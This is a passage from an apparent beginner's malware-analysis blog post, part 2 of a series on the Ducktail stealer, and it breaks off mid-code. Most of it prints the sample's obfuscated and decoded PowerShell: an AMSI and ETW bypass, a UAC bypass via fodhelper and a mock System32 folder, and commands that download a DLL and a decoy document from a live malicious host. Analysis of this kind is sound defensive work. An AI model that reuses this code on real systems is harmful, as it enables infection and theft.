How to disecting your Remote Access Trojan for beginners: Ducktail Stealer Part 2.

Cristóbal Martínez
11 min readJun 19, 2024

--

We continue from part 1.

Well, the result of the last code will be another PowerShell, here is the full code:

$mfxtfsh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Rjb3VudCAtZ3QgMCkNCiAgICB7DQogICAgICAgIHRyeXsNCiAgICAgICAgICAgIEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgJFVybCAtT3V0RmlsZSAkRGVzdGluYXRpb247DQogICAgICAgICAgICBXcml0ZS1Ib3N0ICJEb3dubG9hZCBzdWNjZXNzICRVcmwiOw0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIH0NCiAgICAgICAgY2F0Y2gNCiAgICAgICAgew0KICAgICAgICAgICAgV3JpdGUtSG9zdCAkXy5FeGNlcHRpb24uTWVzc2FnZTsNCiAgICAgICAgICAgIFdyaXRlLUhvc3QgIkVycm9yIGRvd25sb2FkIGZpbGUgJFVybCINCiAgICAgICAgICAgICRjb3VudCAtPSAxOw0KDQogICAgICAgICAgICBTdGFydC1TbGVlcCAtcyAxNTsNCiAgICAgICAgfQ0KICAgIH0NCn0NCldyaXRlLUhvc3QgIkNoZWNrIG11dGV4dCI7DQokbXR4X2NoaWxkID0gTmV3LU9iamVjdCBTeXN0ZW0uVGhyZWFkaW5nLk11dGV4KCRmYWxzZSwgIlNUQVJUVUFDIik7DQokbXR4ID0gTmV3LU9iamVjdCBTeXN0ZW0uVGhyZWFkaW5nLk11dGV4KCRmYWxzZSwgIlJVTk5JTkciKTsNCiRsb2NrQWNxdWlyZWQgPSAkbXR4LldhaXRPbmUoMCk7DQokbG9ja0FjcXVpcmVkQ2hpbGQgPSAkbXR4X2NoaWxkLldhaXRPbmUoMCk7DQppZiAoJGxvY2tBY3F1aXJlZCAtZXEgJHRydWUgLWFuZCAkbG9ja0FjcXVpcmVkQ2hpbGQgLWVxICR0cnVlKSANCnsNCiAgICAkbXR4LlJlbGVhc2VNdXRleCgpOw0KICAgIFdyaXRlLUhvc3QgIk11dGV4IGlzIG5vdCBsb2NrZWQiOw0KICAgICRpc1VBQ09wZW4gPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxcU09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFBvbGljaWVzXFxTeXN0ZW0pLkVuYWJsZUxVQTsNCiAgICAgDQogICAgaWYoJGlzVUFDT3BlbiAtZXEgMSkNCiAgICB7DQogICAgICAgICRpc1VBQ09wZW4gPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLkNvbnNlbnRQcm9tcHRCZWhhdmlvckFkbWluOw0KICAgIH0NCiAgICBXcml0ZS1Ib3N0ICRpc1VBQ09wZW47DQoNCiAgICBpZigkaXNVQUNPcGVuIC1lcSAwKQ0KICAgIHsNCiAgICAgICAgV3JpdGUtSG9zdCAia28gY2FuIGJ5cGFzcyB1YWMiOw0KICAgICAgICBTdGFydC1Qcm9jZXNzICJjbWQuZXhlIiAtV2luZG93U3R5bGUgaGlkZGVuIC1WZXJiIHJ1bmFzIC1Bcmd1bWVudExpc3QgKCIvYyBzdGFydCAvbWluICIiIHBvd2Vyc2hlbGwuZXhlIC1XaW5kb3dTdHlsZSBoaWRkZW4gIC1Ob0xvZ28gLU5vUHJvZmlsZSAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtRW5jb2RlZENvbW1hbmQgSkFCaEFIa0Fkd0JqQUhnQWRBQm9BR2tBWWdCa0FEMEFXd0JUQUhrQWN3QjBBR1VBYlFBdUFGUUFaUUI0QUhRQUxnQkZBRzRBWXdCdkFHUUFhUUJ1QUdjQVhRQTZBRG9BUVFCVEFFTUFTUUJKQUM0QVJ3QmxBSFFBVXdCMEFISUFhUUJ1QUdjQUtBQmJBRk1BZVFCekFIUUFaUUJ0QUM0QVF3QnZBRzRBZGdCbEFISUFkQUJkQURvQU9nQkdBSElBYndCdEFFSUFZUUJ6QUdVQU5nQTBBRk1BZEFCeUFHa0FiZ0JuQUNnQUlnQmtBRWNBUlFCMkFHTUFTQUJOQUhZQVR3QkhBRTBBZUFCYUFFUUFSZ0JvQUUwQVZBQlZBSGtBVFFCdEFGVUFkd0JOQUhvQVl3QjNBRTRBVndCT0FHc0FUUUJIQUVvQWFBQk9BRzBBVmdCc0FFMEFhZ0JDQUcwQVRnQkVBR1FBYkFCTkFESUFUUUE5QUNJQUtRQXBBRHNBQ2dBa0FIUUFkQUJtQUc4QVlnQTlBRnNBVXdCNUFITUFkQUJsQUcwQUxnQlVBR1VBZUFCMEFDNEFSUUJ1QUdNQWJ3QmtBR2tBYmdCbkFGMEFPZ0E2QUVFQVV3QkRBRWtBU1FBdUFFY0FaUUIwQUZNQWRBQnlBR2tBYmdCbkFDZ0FXd0JUQUhrQWN3QjBBR1VBYlFBdUFFTUFid0J1QUhZQVpRQnlBSFFBWFFBNkFEb0FSZ0J5QUc4QWJRQkNBR0VBY3dCbEFEWUFOQUJUQUhRQWNnQnBBRzRBWndBb0FDSUFZUUJJQUZJQU1BQmpBRVFBYndCMkFFd0FNZ0JTQUdnQVpBQkhBRVlBTUFCakFHMEFSZ0IxQUZvQWJRQldBSGtBVEFCdEFEa0FkUUJpQUVjQWJBQjFBRm9BVXdBNUFHZ0FZd0JIQUdzQWRnQmFBRzBBYkFCekFGb0FWd0JTQUdnQUlnQXBBQ2tBT3dBS0FDUUFkUUJ5QUdrQUlBQTlBQ0FBS0FBa0FIUUFkQUJtQUc4QVlnQWdBQ3NBSUFBa0FHRUFlUUIzQUdNQWVBQjBBR2dBYVFCaUFHUUFLUUE3QUFvQUpBQmpBRzhBZFFCdUFIUUFJQUE5QUNBQU1RQXdBRHNBQ2dCM0FHZ0FhUUJzQUdVQUtBQWtBR01BYndCMUFHNEFkQUFnQUMwQVp3QjBBQ0FBTUFBcEFBb0Fld0FLQUFrQUNnQUpBSFFBY2dCNUFIc0FDZ0FKQUFrQUpBQmpBRzhBYmdCMEFHVUFiZ0IwQUNBQVBRQWdBRWtBYmdCMkFHOEFhd0JsQUMwQVZ3QmxBR0lBVWdCbEFIRUFkUUJsQUhNQWRBQWdBQzBBVlFCeUFHa0FJQUFrQUhVQWNnQnBBQ0FBTFFCVkFITUFaUUJDQUdFQWN3QnBBR01BVUFCaEFISUFjd0JwQUc0QVp3QTdBQW9BQ1FBSkFFa0FiZ0IyQUc4QWF3QmxBQzBBUlFCNEFIQUFjZ0JsQUhNQWN3QnBBRzhBYmdBZ0FDUUFZd0J2QUc0QWRBQmxBRzRBZEFBdUFHTUFid0J1QUhRQVpRQnVBSFFBT3dBS0FBa0FDUUJpQUhJQVpRQmhBR3NBT3dBS0FBa0FmUUFLQUFrQVl3QmhBSFFBWXdCb0FBb0FDUUI3QUFvQUNRQUpBRmNBY2dCcEFIUUFaUUF0QUVnQWJ3QnpBSFFBSUFBa0FGOEFMZ0JGQUhnQVl3QmxBSEFBZEFCcEFHOEFiZ0F1QUUwQVpRQnpBSE1BWVFCbkFHVUFDZ0FKQUFrQUpBQmpBRzhBZFFCdUFIUUFJQUF0QUQwQUlBQXhBRHNBQ2dBSkFBa0FVd0IwQUdFQWNnQjBBQzBBVXdCc0FHVUFaUUJ3QUNBQUxRQnpBQ0FBTVFBMUFEc0FDZ0FKQUgwQUNnQjlBQW9BIik7DQoJCWV4aXQ7DQogICAgfQ0KICAgIGVsc2UNCiAgICB7DQogICAgICAgIFdyaXRlLUhvc3QgImJ5cGFzcyB1YWMgcnVuIGNtZCI7DQogICAgICAgIFN0YXJ0LXByb2Nlc3MgInBvd2Vyc2hlbGwuZXhlIiAgLUFyZ3VtZW50TGlzdCAoIi1FbmNvZGVkQ29tbWFuZCBVd0IwQUdFQWNnQjBBQzBBVUFCeUFHOEFZd0JsQUhNQWN3QWdBQ0lBWXdCdEFHUUFMZ0JsQUhnQVpRQWlBQ0FBTFFCQkFISUFad0IxQUcwQVpRQnVBSFFBVEFCcEFITUFkQUFnQUNnQUlnQXZBR01BSUFCdEFHc0FaQUJwQUhJQUlBQWlBQ0lBUXdBNkFGd0FWd0JwQUc0QVpBQnZBSGNBY3dBZ0FGd0FJZ0FpQUNBQUpnQWdBRzBBYXdCa0FHa0FjZ0FnQUNJQUlnQkRBRG9BWEFCWEFHa0FiZ0JrQUc4QWR3QnpBQ0FBWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFBaUFDSUFJQUFtQUNBQVl3QnZBSEFBZVFBZ0FDSUFJZ0JEQURvQVhBQlhBR2tBYmdCa0FHOEFkd0J6QUZ3QVV3QjVBSE1BZEFCbEFHMEFNd0F5QUZ3QVpnQnZBR1FBYUFCbEFHd0FjQUJsQUhJQUxnQmxBSGdBWlFBaUFDSUFJQUFpQUNJQVF3QTZBRndBVndCcEFHNEFaQUJ2QUhjQWN3QWdBRndBVXdCNUFITUFkQUJsQUcwQU13QXlBRndBSWdBaUFDSUFLUUFnQUMwQVZ3QnBBRzRBWkFCdkFIY0FVd0IwQUhrQWJBQmxBQ0FBU0FCcEFHUUFaQUJsQUc0QUlBQWdBQzBBVndCaEFHa0FkQUE3QUE9PSIpIC1XaW5kb3dTdHlsZSBIaWRkZW4gIC1XYWl0Ow0KICAgICAgICANCiAgICAgICAgd2hpbGUoJHRydWUpew0KICAgICAgICAgICAgV3JpdGUtSG9zdCAiZG93bmxvYWQgZmlsZSI7DQogICAgICAgICAgICBEb3dubG9hZC1GaWxlRnJvbVVybCAtVXJsICJodHRwOi8vZGF0YXRyYW5mZXIub25saW5lL2FwaS9maWxlZGF0YS9kbGwvNzMzOWVhOWI4YzljMmI3Y2NkMmI3Zjc5Nzc0NTZiNDEiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJvcHN5cy5kbGwiOw0KICAgICAgICAgICAgV3JpdGUtSG9zdCAiU3RhcnQgVGVtcCI7DQogICAgICAgICAgICAkY29tbWFuZCA9ICIvYyAiIkM6XFdpbmRvd3MgXFN5c3RlbTMyXGZvZGhlbHBlci5leGUiIiI7DQogICAgICAgICAgICBXcml0ZS1Ib3N0ICRjb21tYW5kOw0KICAgICAgICAgICAgJGNtZE5hbWUgPSAiY21kLmV4ZSI7DQogICAgICAgICAgICBXcml0ZS1Ib3N0ICAkY21kTmFtZTsNCiAgICAgICAgICAgICRtdHhfcmFuZG9tTXV0ZXg9IE5ldy1PYmplY3QgU3lzdGVtLlRocmVhZGluZy5NdXRleCgkZmFsc2UsICJNeVJhbmRvbU11dGV4Iik7DQogICAgICAgICAgICAkbXR4X3JhbmRvbU11dGV4LldhaXRPbmUoMCk7DQogICAgICAgICAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAxOw0KICAgICAgICAgICAgd3JpdGUtaG9zdCAic3RhcnQgcHJvY2Vzcywgd2FpdCBzdG9wIjsNCiAgICAgICAgICAgIFN0YXJ0LVByb2Nlc3MgJGNtZE5hbWUgLUFyZ3VtZW50TGlzdCAoJGNvbW1hbmQpIC1XaW5kb3dTdHlsZSBIaWRkZW47DQogICAgICAgICAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAyOw0KDQogICAgICAgICAgICB0cnl7DQogICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRsb2NrQWNxdWlyZWQgPSAkbXR4LldhaXRPbmUoMCk7DQogICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiTG9jayBzdGF0dXMgJCgkbG9ja0FjcXVpcmVkKSI7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBjYXRjaHsNCiAgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiQW4gZXJyb3Igb2NjdXJyZWQ6ICQoJF8uRXhjZXB0aW9uLk1lc3NhZ2UpIjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgDQogICAgICAgICAgICAkY291bnRXYWl0ID0gMTA7DQogICAgICAgICAgICB3aGlsZSgkY291bnRXYWl0IC1ndCAwIC1hbmQgICRsb2NrQWNxdWlyZWQgLWVxICR0cnVlKXsNCiAgICAgICAgICAgICAgICB0cnl7DQogICAgICAgICAgICAgICAgICAgIFN0YXJ0LVNsZWVwIC1TZWNvbmRzIDE7DQogICAgICAgICAgICAgICAgICAgICRtdHguUmVsZWFzZU11dGV4KCk7DQogICAgICAgICAgICAgICAgICAgIFN0YXJ0LVNsZWVwIC1TZWNvbmRzIDE7DQogICAgICAgICAgICAgICAgICAgICRjb3VudFdhaXQtLTsNCiAgICAgICAgICAgICAgICAgICAgJGxvY2tBY3F1aXJlZCA9ICRtdHguV2FpdE9uZSgwKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgY2F0Y2h7DQogICAgICAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJBbiBlcnJvciBvY2N1cnJlZCAyOiAkKCRfLkV4Y2VwdGlvbi5NZXNzYWdlKSI7DQogICAgICAgICAgICAgICAgICAgIGJyZWFrOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICANCg0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgJG10eF9yYW5kb21NdXRleC5SZWxlYXNlTXV0ZXgoKTsNCiAgICAgICAgICAgIGlmKCRjb3VudFdhaXQgLWd0IDApew0KICAgICAgICAgICAgICAgIHdyaXRlLWhvc3QgIk9LIjsNCiAgICAgICAgICAgICAgICBicmVhazsNCiAgICAgICAgICAgIH0NCg0KDQogICAgICAgICAgICBXcml0ZS1Ib3N0ICJUcnkgYWdhaW4iOw0KICAgICAgICB9DQogICAgICAgDQogICAgfQ0KDQoNCiAgICBTdGFydC1TbGVlcCAtU2Vjb25kcyAxMDsNCg0KDQp9IA0KdHJ5ew0KICAgICRtdHguUmVsZWFzZU11dGV4KCk7DQp9Y2F0Y2h7DQogICAgI2JvIHF1YQ0KfQ0KdHJ5ew0KICAgICRtdHhfY2hpbGQuUmVsZWFzZU11dGV4KCk7IA0KfWNhdGNoew0KICAgICNibyBxdWENCn0NCg0KV3JpdGUtaG9zdCAiT0siOw0KDQoNCg0KV2FpdC1Kb2IgJGpvYg0KUmVtb3ZlLUpvYiAkam9iDQo="));
$utsizbwrfw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SXcwS0l5QnZjR1Z1Um1sc1pTNXdjekVOQ2lNTkNnMEtJeUJFWldacGJtVWdkR2hsSUdacGJHVWdibUZ0WlNCaGJtUWdjR0YwYUhNTkNpUm1hV3hsVG1GdFpTQTlJQ0l3Tmpsa09HUm1ORE0xWVdNNU5qRTVaVEF6TmpFellqYzNZbU16Wm1abE9DNWtiMk40SWcwS0pIUmxiWEJHYjJ4a1pYSWdQU0JiVTNsemRHVnRMa2xQTGxCaGRHaGRPanBIWlhSVVpXMXdVR0YwYUNncE93MEtKR1pwYkdWUVlYUm9JRDBnU205cGJpMVFZWFJvSUMxUVlYUm9JQ1IwWlcxd1JtOXNaR1Z5SUMxRGFHbHNaRkJoZEdnZ0pHWnBiR1ZPWVcxbERRb2tabWxzWlZWeWJDQTlJQ0pvZEhSd09pOHZaR0YwWVhSeVlXNW1aWEl1YjI1c2FXNWxMMlpwYkdVdlpHOWpjeThrWm1sc1pVNWhiV1VpT3cwS0RRb2pJRU55WldGMFpTQmhJSE5qY21sd2RDQmliRzlqYXlCbWIzSWdkR2hsSUdwdllnMEtKSE5qY21sd2RFSnNiMk5ySUQwZ2V3MEtJQ0FnSUhCaGNtRnRJQ2dOQ2lBZ0lDQWdJQ0FnVzNOMGNtbHVaMTBrWm1sc1pWQmhkR2dzRFFvZ0lDQWdJQ0FnSUZ0emRISnBibWRkSkdacGJHVlZjbXdOQ2lBZ0lDQXBEUW9OQ2lBZ0lDQWpJRU5vWldOcklHbG1JSFJvWlNCbWFXeGxJR1Y0YVhOMGN3MEtJQ0FnSUdsbUlDZ3RibTkwSUNoVVpYTjBMVkJoZEdnZ0xWQmhkR2dnSkdacGJHVlFZWFJvS1NrZ2V3MEtJQ0FnSUNBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wTGlCRWIzZHViRzloWkdsdVp5NHVMaUlOQ2lBZ0lDQWdJQ0FnRFFvZ0lDQWdJQ0FnSUNNZ1JHOTNibXh2WVdRZ2RHaGxJR1pwYkdVZ1puSnZiU0IwYUdVZ1ZWSk1EUW9nSUNBZ0lDQWdJRWx1ZG05clpTMVhaV0pTWlhGMVpYTjBJQzFWY21rZ0pHWnBiR1ZWY213Z0xVOTFkRVpwYkdVZ0pHWnBiR1ZRWVhSb0RRb2dJQ0FnSUNBZ0lBMEtJQ0FnSUNBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pFYjNkdWJHOWhaQ0JqYjIxd2JHVjBaUzRpRFFvZ0lDQWdmUTBLRFFvZ0lDQWdJeUJQY0dWdUlIUm9aU0JtYVd4bElIZHBkR2dnZEdobElHUmxabUYxYkhRZ2NISnZaM0poYlEwS0lDQWdJRk4wWVhKMExWQnliMk5sYzNNZ0xVWnBiR1ZRWVhSb0lDUm1hV3hsVUdGMGFBMEtmUTBLRFFvaklGTjBZWEowSUhSb1pTQnFiMklOQ2lScWIySWdQU0JUZEdGeWRDMUtiMklnTFZOamNtbHdkRUpzYjJOcklDUnpZM0pwY0hSQ2JHOWpheUF0UVhKbmRXMWxiblJNYVhOMElDUm1hV3hsVUdGMGFDd2dKR1pwYkdWVmNtd05DZzBLSXlCRGFHVmpheUJwWmlCMGFHVWdhbTlpSUdseklISjFibTVwYm1jTkNtbG1JQ2drYW05aUxsTjBZWFJsSUMxbGNTQW5VblZ1Ym1sdVp5Y3BJSHNOQ2lBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pLYjJJZ2FYTWdjblZ1Ym1sdVp5NGdTbTlpSUVsRU9pQWtLQ1JxYjJJdVNXUXBJZzBLZlNCbGJITmxJSHNOQ2lBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pLYjJJZ1ptRnBiR1ZrSUhSdklITjBZWEowTGlJTkNuME5DZzBLRFFvTkNnMEtablZ1WTNScGIyNGdSRzkzYm14dllXUXRSbWxzWlVaeWIyMVZjbXdnZXcwS0lDQWdJSEJoY21GdElDZ05DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtWWEpzTEEwS0lDQWdJQ0FnSUNCYmMzUnlhVzVuWFNSRVpYTjBhVzVoZEdsdmJnMEtJQ0FnSUNrTkNnMEtJQ0FnSUNSamIzVnVkQ0E5SURFd093MEtJQ0FnSUhkb2FXeGxLQw=="));
$hyncamws=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHVibGljLFN0YXRpYw=="));
$bovlwqvgbv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$bdvmg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dHdQcm92aWRlcg=="));
$tjjjhwk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZQ=="));
$hmndchg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVy"));
$iceclpuhk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3k="));
$rxnhtw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsSW5zdGFuY2U="));
$zceyyso=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUA=="));
$ibzfakiwj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bV9lbmFibGVk"));
$xrbgfk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$dwsmar=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVy"));
$fheudqhgrx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGU="));
$qposrf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eXN0ZW0uQ29yZQ=="));
$bzehatvak=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
$qauuxyvoyl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsU3RhdGlj"));
$kyflk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUA=="));
$dgufplyl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("c2lJbml0RmFpbGVk"));
$aylsisopw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW0="));
$lgqhad=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscw=="));
$hxqcf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdA=="));
$luqyrk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("WjNoM1lta2dQU0FrZEhKMVpRPT0="));
$mrzdr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkhCd1kzTm0="));
Invoke-Expression
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($mrzdr
+ $luqyrk)))); $scklyswgmmajfkay = [Ref].Assembly.GetType(($hxqcf +
$lgqhad)).GetField(($aylsisopw + $dgufplyl),($kyflk + $qauuxyvoyl));
$scklyswgmmajfkay.SetValue($null,$ppcsfgxwbi);
[Reflection.Assembly]::LoadWithPartialName(($bzehatvak +
$qposrf)).GetType(($fheudqhgrx + $dwsmar)).GetField(($xrbgfk +
$ibzfakiwj),($zceyyso + $rxnhtw)).SetValue([Ref].Assembly.GetType(($iceclpuhk +
$hmndchg)).GetField(($tjjjhwk + $bdvmg),($kyflk +
$qauuxyvoyl)).GetValue($null),0); Invoke-Expression
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($utsizbwrfw + $mfxtfsh))));

This last code is somewhat larger, but if we look closely, the IOA is the same, cut code + 2 parts for the payload that must be joined, again I will get to the point, with the variables $utsizbwrfw + $mfxtfsh where the payload will be (hopefully final):

#
# openFile.ps1
#
# Define the file name and paths
$fileName = "069d8df435ac9619e03613b77bc3ffe8.docx"
$tempFolder = [System.IO.Path]::GetTempPath();
$filePath = Join-Path -Path $tempFolder -ChildPath $fileName
$fileUrl = "<http://datatranfer.online/file/docs/$fileName>";
# Create a script block for the job
$scriptBlock = {
param (
[string]$filePath,
[string]$fileUrl
)
# Check if the file exists
if (-not (Test-Path -Path $filePath)) {
Write-Host "File does not exist. Downloading..."

# Download the file from the URL
Invoke-WebRequest -Uri $fileUrl -OutFile $filePath

Write-Host "Download complete."
}
# Open the file with the default program
Start-Process -FilePath $filePath
}
# Start the job
$job = Start-Job -ScriptBlock $scriptBlock -ArgumentList $filePath, $fileUrl
# Check if the job is running
if ($job.State -eq 'Running') {
Write-Host "Job is running. Job ID: $($job.Id)"
} else {
Write-Host "Job failed to start."
}
function Download-FileFromUrl {
param (
[string]$Url,
[string]$Destination
)
$count = 10;
while($count -gt 0)
{
try{
Invoke-WebRequest -URI $Url -OutFile $Destination;
Write-Host "Download success $Url";
break;
}
catch
{
Write-Host $_.Exception.Message;
Write-Host "Error download file $Url"
$count -= 1;
Start-Sleep -s 15;
}
}
}
Write-Host "Check mutext";
$mtx_child = New-Object System.Threading.Mutex($false, "STARTUAC");
$mtx = New-Object System.Threading.Mutex($false, "RUNNING");
$lockAcquired = $mtx.WaitOne(0);
$lockAcquiredChild = $mtx_child.WaitOne(0);
if ($lockAcquired -eq $true -and $lockAcquiredChild -eq $true)
{
$mtx.ReleaseMutex();
Write-Host "Mutex is not locked";
$isUACOpen = (Get-ItemProperty HKLM:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System).EnableLUA;

if($isUACOpen -eq 1)
{
$isUACOpen = (Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System).ConsentPromptBehaviorAdmin;
}
Write-Host $isUACOpen;
if($isUACOpen -eq 0)
{
Write-Host "ko can bypass uac";
Start-Process "cmd.exe" -WindowStyle hidden -Verb runas -ArgumentList ("/c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABhAHkAdwBjAHgAdABoAGkAYgBkAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBkAEcARQB2AGMASABNAHYATwBHAE0AeABaAEQARgBoAE0AVABVAHkATQBtAFUAdwBNAHoAYwB3AE4AVwBOAGsATQBHAEoAaABOAG0AVgBsAE0AagBCAG0ATgBEAGQAbABNADIATQA9ACIAKQApADsACgAkAHQAdABmAG8AYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEQAbwB2AEwAMgBSAGgAZABHAEYAMABjAG0ARgB1AFoAbQBWAHkATABtADkAdQBiAEcAbAB1AFoAUwA5AGgAYwBHAGsAdgBaAG0AbABzAFoAVwBSAGgAIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAHQAdABmAG8AYgAgACsAIAAkAGEAeQB3AGMAeAB0AGgAaQBiAGQAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkACgAJAHQAcgB5AHsACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AAoACQAJAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAAuAGMAbwBuAHQAZQBuAHQAOwAKAAkACQBiAHIAZQBhAGsAOwAKAAkAfQAKAAkAYwBhAHQAYwBoAAoACQB7AAoACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsACgAJAH0ACgB9AAoA");
exit;
}
else
{
Write-Host "bypass uac run cmd";
Start-process "powershell.exe" -ArgumentList ("-EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAYwBtAGQALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAIgAvAGMAIABtAGsAZABpAHIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAIgAiACAAJgAgAG0AawBkAGkAcgAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAAiACIAIAAmACAAYwBvAHAAeQAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQAiACIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyAFwAIgAiACIAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAgAC0AVwBhAGkAdAA7AA==") -WindowStyle Hidden -Wait;

while($true){
Write-Host "download file";
Download-FileFromUrl -Url "<http://datatranfer.online/api/filedata/dll/7339ea9b8c9c2b7ccd2b7f7977456b41>" -Destination "C:\\Windows \\System32\\propsys.dll";
Write-Host "Start Temp";
$command = "/c ""C:\\Windows \\System32\\fodhelper.exe""";
Write-Host $command;
$cmdName = "cmd.exe";
Write-Host $cmdName;
$mtx_randomMutex= New-Object System.Threading.Mutex($false, "MyRandomMutex");
$mtx_randomMutex.WaitOne(0);
Start-Sleep -Seconds 1;
write-host "start process, wait stop";
Start-Process $cmdName -ArgumentList ($command) -WindowStyle Hidden;
Start-Sleep -Seconds 2;
try{

$lockAcquired = $mtx.WaitOne(0);
Write-Host "Lock status $($lockAcquired)";
}
catch{
Write-Host "An error occurred: $($_.Exception.Message)";
}

$countWait = 10;
while($countWait -gt 0 -and $lockAcquired -eq $true){
try{
Start-Sleep -Seconds 1;
$mtx.ReleaseMutex();
Start-Sleep -Seconds 1;
$countWait--;
$lockAcquired = $mtx.WaitOne(0);
}
catch{
Write-Host "An error occurred 2: $($_.Exception.Message)";
break;
}
}
$mtx_randomMutex.ReleaseMutex();
if($countWait -gt 0){
write-host "OK";
break;
